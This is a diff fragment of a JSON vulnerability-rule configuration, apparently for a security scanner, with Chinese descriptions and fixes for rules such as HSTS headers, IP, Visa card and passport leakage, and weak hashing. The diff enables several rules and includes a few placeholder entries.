\u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nheader('Strict-Transport-Security:value')\n\u5982\u679c\u662fasp\u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0 HTTP\u54cd\u5e94\u5934\n\nResponse.AddHeader \"Strict-Transport-Security\",\"value\"\n\u5982\u679c\u662fpython django \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nresponse=HttpResponse() \nresponse['Strict-Transport-Security']=\"value\u201d\n\u5982\u679c\u662fpython flask\u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0 HTTP\u54cd\u5e94\u5934\n\nresponse=make_ response()\nresponse.headers[\"Strict-Transport-Security\"]=\"value\";\n2\u3001\u4fee\u6539\u8d1f\u8f7d\u5747\u8861\u6216\u53cd\u5411\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u7ed9HTTP\u54cd\u5e94\u5934\u52a0\u4e0aStrict-Transport-Security;\n\n\u5982\u679c\u4f7f\u7528Nginx\u3001Tengine\u3001Open resty \u7b49\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u5199\u5165\u5982\u4e0b\u5185\u5bb9\u5373\u53ef\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\uff1b\n\nadd_header Strict-Transport-Security value\uff1b\n\u5982\u679c\u4f7f\u7528Apache\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u5199\u5165\u5982\u4e0b\u5185\u5bb9\u5373\u53ef\u6dfb\u52a0HTTP\u554a\u5e94\u5934\uff1a\n\nHeader add Strict-Transport-Security\"value\"\u3002", + "vul_fix": "fgf", + "vul_fix_en": null, + "vul_fix_zh": "fgf", + "vul_name": "3", + "vul_name_en": null, + "vul_name_zh": "3", + "vul_type": "3" + }, { "level": 3, "state": "enable", @@ -15,6 +63,22 @@ "vul_name_zh": "\u6587\u4ef6\u5199\u5165", "vul_type": "FileWrite" }, + { + "level": 5, + "state": "enable", + "system_type": 1, + "user": 1, + "vul_desc": "IP\u5730\u5740\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u8ba1\u7b97\u673a\u6216\u8bbe\u5907\u7684IP\u5730\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u6cc4\u9732\u548c\u7f51\u7edc\u5b89\u5168\u98ce\u9669\u3002\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6cc4\u9732\u7684IP\u5730\u5740\u6765\u8ffd\u8e2a\u7528\u6237\u7684\u5728\u7ebf\u6d3b\u52a8\u3001\u8fdb\u884c\u7f51\u7edc\u5165\u4fb5\u3001\u53d1\u8d77\u5206\u5e03\u5f0f\u62d2\u7edd\u670d\u52a1\uff08DDoS\uff09\u653b\u51fb\u7b49\u6076\u610f\u884c\u4e3a\uff0c\u5bf9\u4e2a\u4eba\u548c\u7ec4\u7ec7\u7684\u7f51\u7edc\u5b89\u5168\u6784\u6210\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4IP\u5730\u5740\u7684\u9690\u79c1\u548c\u5b89\u5168\u81f3\u5173\u91cd\u8981\u3002", + "vul_desc_en": null, + "vul_desc_zh": "IP\u5730\u5740\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u8ba1\u7b97\u673a\u6216\u8bbe\u5907\u7684IP\u5730\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u6cc4\u9732\u548c\u7f51\u7edc\u5b89\u5168\u98ce\u9669\u3002\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6cc4\u9732\u7684IP\u5730\u5740\u6765\u8ffd\u8e2a\u7528\u6237\u7684\u5728\u7ebf\u6d3b\u52a8\u3001\u8fdb\u884c\u7f51\u7edc\u5165\u4fb5\u3001\u53d1\u8d77\u5206\u5e03\u5f0f\u62d2\u7edd\u670d\u52a1\uff08DDoS\uff09\u653b\u51fb\u7b49\u6076\u610f\u884c\u4e3a\uff0c\u5bf9\u4e2a\u4eba\u548c\u7ec4\u7ec7\u7684\u7f51\u7edc\u5b89\u5168\u6784\u6210\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4IP\u5730\u5740\u7684\u9690\u79c1\u548c\u5b89\u5168\u81f3\u5173\u91cd\u8981\u3002", + "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_fix_en": null, + "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_name": "IP\u5730\u5740\u6cc4\u9732", + "vul_name_en": null, + "vul_name_zh": "IP\u5730\u5740\u6cc4\u9732", + "vul_type": "IP\u5730\u5740\u6cc4\u9732" + }, { "level": 1, "state": "enable", @@ -111,6 +175,22 @@ "vul_name_zh": "Response Without X-Content-Type-Options Header", "vul_type": "Response Without X-Content-Type-Options Header" }, + { + "level": 1, + "state": "enable", + "system_type": 1, + "user": 1, + "vul_desc": "Visa\u5361\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684Visa\u4fe1\u7528\u5361\u6216\u501f\u8bb0\u5361\u53f7\u7801\u4ee5\u53ca\u76f8\u5173\u654f\u611f\u652f\u4ed8\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u5bfc\u81f4\u4e2a\u4eba\u91d1\u878d\u9690\u79c1\u53d7\u5230\u5a01\u80c1\u7684\u4e00\u79cd\u4e25\u91cd\u6f0f\u6d1e\u3002\n\u4e00\u65e6Visa\u5361\u4fe1\u606f\u88ab\u6cc4\u9732\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u5229\u7528\u8fd9\u4e9b\u4fe1\u606f\u8fdb\u884c\u5404\u79cd\u6076\u610f\u6d3b\u52a8\uff0c\u5305\u62ec\u975e\u6cd5\u8d2d\u7269\u3001\u91d1\u878d\u8bc8\u9a97\u3001\u8eab\u4efd\u76d7\u7a83\u4ee5\u53ca\u975e\u6cd5\u8f6c\u8d26\u3002\u4f8b\u5982\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u88ab\u6cc4\u9732\u7684\u5361\u53f7\u8fdb\u884c\u5728\u7ebf\u8d2d\u7269\u6216\u5b9e\u9645\u8d2d\u4e70\u5546\u54c1\u548c\u670d\u52a1\uff0c\u4ece\u800c\u5bfc\u81f4\u5361\u4e3b\u8d26\u6237\u8d44\u91d1\u88ab\u76d7\u6216\u8005\u6b20\u6b3e\u589e\u52a0\u3002\u6b64\u5916\uff0cVisa\u5361\u4fe1\u606f\u7684\u6cc4\u9732\u8fd8\u53ef\u80fd\u5bfc\u81f4\u4fe1\u7528\u8bc4\u5206\u4e0b\u964d\uff0c\u5bf9\u5361\u4e3b\u7684\u4fe1\u7528\u8bb0\u5f55\u4ea7\u751f\u8d1f\u9762\u5f71\u54cd\u3002\n\u4e3a\u4e86\u4fdd\u62a4Visa\u5361\u4fe1\u606f\u7684\u5b89\u5168\uff0c\u5361\u4e3b\u5e94\u5f53\u91c7\u53d6\u4e00\u7cfb\u5217\u9884\u9632\u63aa\u65bd\uff0c\u5305\u62ec\u5b9a\u671f\u68c0\u67e5\u8d26\u5355\uff0c\u8bbe\u7f6e\u5f3a\u5bc6\u7801\u548cPIN\u7801\uff0c\u4e0d\u968f\u610f\u5206\u4eab\u5361\u53f7\u7b49\u654f\u611f\u4fe1\u606f\uff0c\u4ee5\u53ca\u5728\u4f7f\u7528\u5361\u65f6\u4fdd\u6301\u8b66\u60d5\u3002\u540c\u65f6\uff0c\u91d1\u878d\u673a\u6784\u548c\u652f\u4ed8\u670d\u52a1\u63d0\u4f9b\u5546\u4e5f\u5e94\u52a0\u5f3a\u5b89\u5168\u63aa\u65bd\uff0c\u76d1\u6d4b\u4e0d\u6b63\u5e38\u7684\u4ea4\u6613\u6d3b\u52a8\uff0c\u4ee5\u53ca\u63d0\u4f9b\u5361\u4e3b\u4fdd\u62a4\u5176\u8d26\u6237\u514d\u53d7\u4e0d\u5f53\u4f7f\u7528\u7684\u624b\u6bb5\u3002\n\u5bf9\u4e8eVisa\u5361\u4fe1\u606f\u7684\u4e0d\u5f53\u6cc4\u9732\uff0c\u76f8\u5173\u6cd5\u5f8b\u6cd5\u89c4\u5e94\u8be5\u52a0\u4ee5\u7ea6\u675f\u548c\u60e9\u7f5a\uff0c\u4ee5\u7ef4\u62a4\u91d1\u878d\u9690\u79c1\u548c\u91d1\u878d\u7cfb\u7edf\u7684\u5b89\u5168\u6027\u3002\u8fd9\u6837\u53ef\u4ee5\u5e2e\u52a9\u51cf\u5c11Visa\u5361\u4fe1\u606f\u6cc4\u9732\u5bf9\u4e2a\u4eba\u548c\u793e\u4f1a\u7684\u6f5c\u5728\u98ce\u9669\u3002", + "vul_desc_en": null, + "vul_desc_zh": "Visa\u5361\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684Visa\u4fe1\u7528\u5361\u6216\u501f\u8bb0\u5361\u53f7\u7801\u4ee5\u53ca\u76f8\u5173\u654f\u611f\u652f\u4ed8\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u5bfc\u81f4\u4e2a\u4eba\u91d1\u878d\u9690\u79c1\u53d7\u5230\u5a01\u80c1\u7684\u4e00\u79cd\u4e25\u91cd\u6f0f\u6d1e\u3002\n\u4e00\u65e6Visa\u5361\u4fe1\u606f\u88ab\u6cc4\u9732\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u5229\u7528\u8fd9\u4e9b\u4fe1\u606f\u8fdb\u884c\u5404\u79cd\u6076\u610f\u6d3b\u52a8\uff0c\u5305\u62ec\u975e\u6cd5\u8d2d\u7269\u3001\u91d1\u878d\u8bc8\u9a97\u3001\u8eab\u4efd\u76d7\u7a83\u4ee5\u53ca\u975e\u6cd5\u8f6c\u8d26\u3002\u4f8b\u5982\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u88ab\u6cc4\u9732\u7684\u5361\u53f7\u8fdb\u884c\u5728\u7ebf\u8d2d\u7269\u6216\u5b9e\u9645\u8d2d\u4e70\u5546\u54c1\u548c\u670d\u52a1\uff0c\u4ece\u800c\u5bfc\u81f4\u5361\u4e3b\u8d26\u6237\u8d44\u91d1\u88ab\u76d7\u6216\u8005\u6b20\u6b3e\u589e\u52a0\u3002\u6b64\u5916\uff0cVisa\u5361\u4fe1\u606f\u7684\u6cc4\u9732\u8fd8\u53ef\u80fd\u5bfc\u81f4\u4fe1\u7528\u8bc4\u5206\u4e0b\u964d\uff0c\u5bf9\u5361\u4e3b\u7684\u4fe1\u7528\u8bb0\u5f55\u4ea7\u751f\u8d1f\u9762\u5f71\u54cd\u3002\n\u4e3a\u4e86\u4fdd\u62a4Visa\u5361\u4fe1\u606f\u7684\u5b89\u5168\uff0c\u5361\u4e3b\u5e94\u5f53\u91c7\u53d6\u4e00\u7cfb\u5217\u9884\u9632\u63aa\u65bd\uff0c\u5305\u62ec\u5b9a\u671f\u68c0\u67e5\u8d26\u5355\uff0c\u8bbe\u7f6e\u5f3a\u5bc6\u7801\u548cPIN\u7801\uff0c\u4e0d\u968f\u610f\u5206\u4eab\u5361\u53f7\u7b49\u654f\u611f\u4fe1\u606f\uff0c\u4ee5\u53ca\u5728\u4f7f\u7528\u5361\u65f6\u4fdd\u6301\u8b66\u60d5\u3002\u540c\u65f6\uff0c\u91d1\u878d\u673a\u6784\u548c\u652f\u4ed8\u670d\u52a1\u63d0\u4f9b\u5546\u4e5f\u5e94\u52a0\u5f3a\u5b89\u5168\u63aa\u65bd\uff0c\u76d1\u6d4b\u4e0d\u6b63\u5e38\u7684\u4ea4\u6613\u6d3b\u52a8\uff0c\u4ee5\u53ca\u63d0\u4f9b\u5361\u4e3b\u4fdd\u62a4\u5176\u8d26\u6237\u514d\u53d7\u4e0d\u5f53\u4f7f\u7528\u7684\u624b\u6bb5\u3002\n\u5bf9\u4e8eVisa\u5361\u4fe1\u606f\u7684\u4e0d\u5f53\u6cc4\u9732\uff0c\u76f8\u5173\u6cd5\u5f8b\u6cd5\u89c4\u5e94\u8be5\u52a0\u4ee5\u7ea6\u675f\u548c\u60e9\u7f5a\uff0c\u4ee5\u7ef4\u62a4\u91d1\u878d\u9690\u79c1\u548c\u91d1\u878d\u7cfb\u7edf\u7684\u5b89\u5168\u6027\u3002\u8fd9\u6837\u53ef\u4ee5\u5e2e\u52a9\u51cf\u5c11Visa\u5361\u4fe1\u606f\u6cc4\u9732\u5bf9\u4e2a\u4eba\u548c\u793e\u4f1a\u7684\u6f5c\u5728\u98ce\u9669\u3002", + "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_fix_en": null, + "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_name": "VISA\u5361\u6cc4\u9732", + "vul_name_en": null, + "vul_name_zh": "VISA\u5361\u6cc4\u9732", + "vul_type": "VISA\u5361\u6cc4\u9732" + }, { "level": 1, "state": "enable", @@ -145,7 +225,7 @@ }, { "level": 3, - "state": "disable", + "state": "enable", "system_type": 1, "user": 1, "vul_desc": "\u6ca1\u6709\u8bbe\u7f6eHTTPS\u4f1a\u8bdd\u4e2d\u654f\u611fcookie\u7684\u5b89\u5168\u5c5e\u6027\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u7528\u6237\u4ee3\u7406\u901a\u8fc7HTTP\u4f1a\u8bdd\u4ee5\u660e\u6587\u53d1\u9001\u8fd9\u4e9bcookie\u3002", @@ -161,7 +241,7 @@ }, { "level": 3, - "state": "disable", + "state": "enable", "system_type": 1, "user": 1, "vul_desc": "\u6570\u636e\u901a\u8fc7\u5f31\u52a0\u5bc6\u7b97\u6cd5MessageDigest\u51fd\u6570\u8fdb\u884c\u52a0\u5bc6", @@ -177,7 +257,7 @@ }, { "level": 3, - "state": "disable", + "state": "enable", "system_type": 1, "user": 1, "vul_desc": "\u54c8\u5e0c\u7b97\u6cd5\u662f\u4f7f\u7528\u54c8\u5e0c\u51fd\u6570\u5c06\u4efb\u610f\u957f\u5ea6\u7684\u6d88\u606f\u6620\u5c04\u6210\u4e3a\u4e00\u4e2a\u957f\u5ea6\u8f83\u77ed\u4e14\u957f\u5ea6\u56fa\u5b9a\u7684\u503c\uff0c\u8fd9\u4e2a\u7ecf\u8fc7\u6620\u5c04\u7684\u503c\u4e3a\u54c8\u5e0c\u503c\u3002\u5b83\u662f\u4e00\u79cd\u5355\u5411\u52a0\u5bc6\u4f53\u5236\uff0c\u5373\u4e00\u4e2a\u4ece\u660e\u6587\u5230\u5bc6\u6587\u7684\u4e0d\u53ef\u9006\u6620\u5c04\uff0c\u53ea\u6709\u52a0\u5bc6\u8fc7\u7a0b\uff0c\u6ca1\u6709\u89e3\u5bc6\u8fc7\u7a0b\u3002\u800c\u4e0d\u5b89\u5168\u7684\u54c8\u5e0c\u7b97\u6cd5\u5219\u53ef\u4ee5\u9006\u5411\u63a8\u51fa\u660e\u6587\u3002\u5728\u5bc6\u7801\u5b66\u4e2d\uff0c\u54c8\u5e0c\u7b97\u6cd5\u4e3b\u8981\u7528\u4e8e\u6d88\u606f\u6458\u8981\u548c\u7b7e\u540d\u6765\u5bf9\u6574\u4e2a\u6d88\u606f\u7684\u5b8c\u6574\u6027\u8fdb\u884c\u6821\u9a8c\uff0c\u6240\u4ee5\u9700\u8981\u54c8\u5e0c\u7b97\u6cd5\u65e0\u6cd5\u63a8\u5bfc\u8f93\u5165\u7684\u539f\u59cb\u503c\uff0c\u8fd9\u662f\u54c8\u5e0c\u7b97\u6cd5\u5b89\u5168\u6027\u7684\u57fa\u7840\u3002\u76ee\u524d\u5e38\u7528\u7684\u54c8\u5e0c\u7b97\u6cd5\u5305\u62ecMD4\u3001MD5\u3001SHA\u7b49\u3002\u672c\u7bc7\u6587\u7ae0\u4ee5JAVA\u8bed\u8a00\u6e90\u4ee3\u7801\u4e3a\u4f8b\uff0c\u5206\u6790\u4e0d\u5b89\u5168\u7684\u54c8\u5e0c\u7b97\u6cd5\u7f3a\u9677\u4ea7\u751f\u7684\u539f\u56e0\u4ee5\u53ca\u4fee\u590d\u65b9\u6cd5\u3002\u8be6\u7ec6\u8bf7\u53c2\u89c1\uff1aCWE ID 327: Use of a Broken or Risky Cryptographic Algorithm (http://cwe.mitre.org/data/definitions/327.html)\u3002", @@ -193,7 +273,7 @@ }, { "level": 3, - "state": "disable", + "state": "enable", "system_type": 1, "user": 1, "vul_desc": "\u968f\u673a\u6570\u5728\u8ba1\u7b97\u673a\u5e94\u7528\u4e2d\u4f7f\u7528\u7684\u6bd4\u8f83\u5e7f\u6cdb\uff0c\u6700\u4e3a\u719f\u77e5\u7684\u4fbf\u662f\u5728\u5bc6\u7801\u5b66\u4e2d\u7684\u5e94\u7528\u3002\u968f\u673a\u6570\u5206\u4e3a\u771f\u968f\u673a\u6570\u548c\u4f2a\u968f\u673a\u6570\uff0c\u6211\u4eec\u7a0b\u5e8f\u4f7f\u7528\u7684\u57fa\u672c\u90fd\u662f\u4f2a\u968f\u673a\u6570\u3002\u4f2a\u968f\u673a\u53c8\u5206\u4e3a\u5f3a\u4f2a\u968f\u673a\u6570\u548c\u5f31\u4f2a\u968f\u673a\u6570\u3002\u4f2a\u968f\u673a\u6570\uff0c\u901a\u8fc7\u4e00\u5b9a\u7b97\u6cd5\u548c\u79cd\u5b50\u5f97\u51fa\u3002\u8f6f\u4ef6\u5b9e\u73b0\u7684\u662f\u4f2a\u968f\u673a\u6570\u3002\u5f3a\u4f2a\u968f\u673a\u6570\uff0c\u96be\u4ee5\u9884\u6d4b\u7684\u968f\u673a\u6570\u3002\u5f31\u4f2a\u968f\u673a\u6570\uff0c\u6613\u4e8e\u9884\u6d4b\u7684\u968f\u673a\u6570\u3002\nJava\u7a0b\u5e8f\u4e2d\uff0c\u4f7f\u7528java.util.Random\u83b7\u5f97\u968f\u673a\u6570\uff0c\u8fd9\u79cd\u968f\u673a\u6570\u6e90\u4e8e\u4f2a\u968f\u673a\u6570\u751f\u6210\u5668\uff0c\u4ea7\u751f\u7684\u968f\u673a\u6570\u5bb9\u6613\u88ab\u9884\u6d4b\uff0c\u5bf9\u4e8e\u5b89\u5168\u6027\u8981\u6c42\u8f83\u9ad8\u7684\u73af\u5883\u4e2d\uff0c\u4f7f\u7528\u8fd9\u79cd\u968f\u673a\u6570\u53ef\u80fd\u4f1a\u964d\u4f4e\u7cfb\u7edf\u5b89\u5168\u6027\uff0c\u4f7f\u653b\u51fb\u8005\u6709\u673a\u53ef\u4e58\u3002", @@ -337,7 +417,7 @@ }, { "level": 2, - "state": "disable", + "state": "enable", "system_type": 1, "user": 1, "vul_desc": "\u8de8\u7ad9\u811a\u672c\u653b\u51fb\u6f0f\u6d1e\u7b80\u79f0XSS\u6f0f\u6d1e,\u4e3b\u8981\u662f\u7531\u4e8e\u5e94\u7528\u540e\u7aef\u672a\u5bf9\u7528\u6237\u8f93\u5165\u8fdb\u884c\u5b89\u5168\u6821\u9a8c\u6216\u6821\u9a8c\u4e0d\u4e25\u683c\u5bfc\u81f4\u6076\u610f\u7528\u6237\u53ef\u81ea\u5b9a\u4e49\u63a7\u5236\u9875\u9762\u8f93\u51fa\u5185\u5bb9\uff0c\u4ece\u800c\u4ea7\u751f\u8de8\u7ad9\u811a\u672c\u653b\u51fb\u6f0f\u6d1e\u3002\u901a\u5e38\u6765\u8bf4\u6076\u610f\u7528\u6237\u901a\u8fc7\u6784\u9020\u95ed\u5408\u6807\u7b7e\u65b9\u5f0f\u5728HTML\u9875\u9762\u4e2d\u63d2\u5165Javascript\u4ee3\u7801\uff0c\u5728\u6b63\u5e38\u7528\u6237\u6d4f\u89c8\u6b64\u9875\u9762\u65f6\u5bf9\u6b63\u5e38\u7528\u6237\u8fdb\u884c\u653b\u51fb\uff0c\u5e38\u89c1\u7684\u653b\u51fb\u65b9\u5f0f\u6709\u83b7\u53d6\u7528\u6237\u7684\u8eab\u4efd\u51ed\u636e\u3001\u5bf9\u7528\u6237\u5185\u7f51\u8fdb\u884c\u63a2\u6d4b\u626b\u63cf\u3001\u6267\u884c\u9493\u9c7c\u6b3a\u9a97\u653b\u51fb\u7b49", @@ -416,8 +496,24 @@ "vul_type": "ssrf" }, { - "level": 3, + "level": 1, "state": "disable", + "system_type": 0, + "user": 1, + "vul_desc": "test", + "vul_desc_en": null, + "vul_desc_zh": "test", + "vul_fix": "", + "vul_fix_en": null, + "vul_fix_zh": "", + "vul_name": "test", + "vul_name_en": null, + "vul_name_zh": "test", + "vul_type": "test" + }, + { + "level": 3, + "state": "enable", "system_type": 1, "user": 1, "vul_desc": "CWE-501\uff0c\u4fe1\u4efb\u8fb9\u754c\u53ef\u4ee5\u8ba4\u4e3a\u662f\u901a\u8fc7\u7a0b\u5e8f\u7ed8\u5236\u7684\u7ebf\u3002 \u5728\u751f\u4ea7\u7ebf\u7684\u4e00\u4fa7\uff0c\u6570\u636e\u4e0d\u53d7\u4fe1\u4efb\u3002 \u5728\u8be5\u884c\u7684\u53e6\u4e00\u7aef\uff0c\u5047\u5b9a\u6570\u636e\u662f\u53ef\u4fe1\u7684\u3002 \u9a8c\u8bc1\u903b\u8f91\u7684\u76ee\u7684\u662f\u5141\u8bb8\u6570\u636e\u5b89\u5168\u5730\u8d8a\u8fc7\u4fe1\u4efb\u8fb9\u754c-\u4ece\u4e0d\u53d7\u4fe1\u4efb\u53d8\u4e3a\u53d7\u4fe1\u4efb\u3002 \u5f53\u7a0b\u5e8f\u6a21\u7cca\u4e86\u53ef\u4fe1\u548c\u4e0d\u53ef\u4fe1\u4e4b\u95f4\u7684\u754c\u9650\u65f6\uff0c\u5c31\u4f1a\u53d1\u751f\u4fe1\u4efb\u8fb9\u754c\u51b2\u7a81\u3002 \u901a\u8fc7\u5728\u540c\u4e00\u6570\u636e\u7ed3\u6784\u4e2d\u7ec4\u5408\u53ef\u4fe1\u6570\u636e\u548c\u4e0d\u53ef\u4fe1\u6570\u636e\uff0c\u7a0b\u5e8f\u5458\u53ef\u4ee5\u66f4\u5bb9\u6613\u5730\u9519\u8bef\u5730\u4fe1\u4efb\u672a\u9a8c\u8bc1\u7684\u6570\u636e\u3002", @@ -559,6 +655,38 @@ "vul_name_zh": "\u624b\u673a\u53f7\u7801\u6cc4\u6f0f", "vul_type": "\u624b\u673a\u53f7\u7801\u6cc4\u6f0f" }, + { + "level": 1, + "state": "enable", + "system_type": 1, + "user": 1, + "vul_desc": "\u62a4\u7167\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u7684\u62a4\u7167\u53f7\u7801\u3001\u59d3\u540d\u3001\u51fa\u751f\u65e5\u671f\u7b49\u654f\u611f\u8eab\u4efd\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u6cc4\u9732\uff0c\u53ef\u80fd\u5bfc\u81f4\u8eab\u4efd\u76d7\u7a83\u3001\u975e\u6cd5\u5165\u5883\u3001\u91d1\u878d\u6b3a\u8bc8\u7b49\u4e25\u91cd\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u5bf9\u53d7\u5bb3\u8005\u7684\u91d1\u878d\u548c\u6cd5\u5f8b\u5b89\u5168\u9020\u6210\u4e25\u91cd\u5a01\u80c1\u3002", + "vul_desc_en": null, + "vul_desc_zh": "\u62a4\u7167\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u7684\u62a4\u7167\u53f7\u7801\u3001\u59d3\u540d\u3001\u51fa\u751f\u65e5\u671f\u7b49\u654f\u611f\u8eab\u4efd\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u6cc4\u9732\uff0c\u53ef\u80fd\u5bfc\u81f4\u8eab\u4efd\u76d7\u7a83\u3001\u975e\u6cd5\u5165\u5883\u3001\u91d1\u878d\u6b3a\u8bc8\u7b49\u4e25\u91cd\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u5bf9\u53d7\u5bb3\u8005\u7684\u91d1\u878d\u548c\u6cd5\u5f8b\u5b89\u5168\u9020\u6210\u4e25\u91cd\u5a01\u80c1\u3002", + "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_fix_en": null, + "vul_fix_zh": 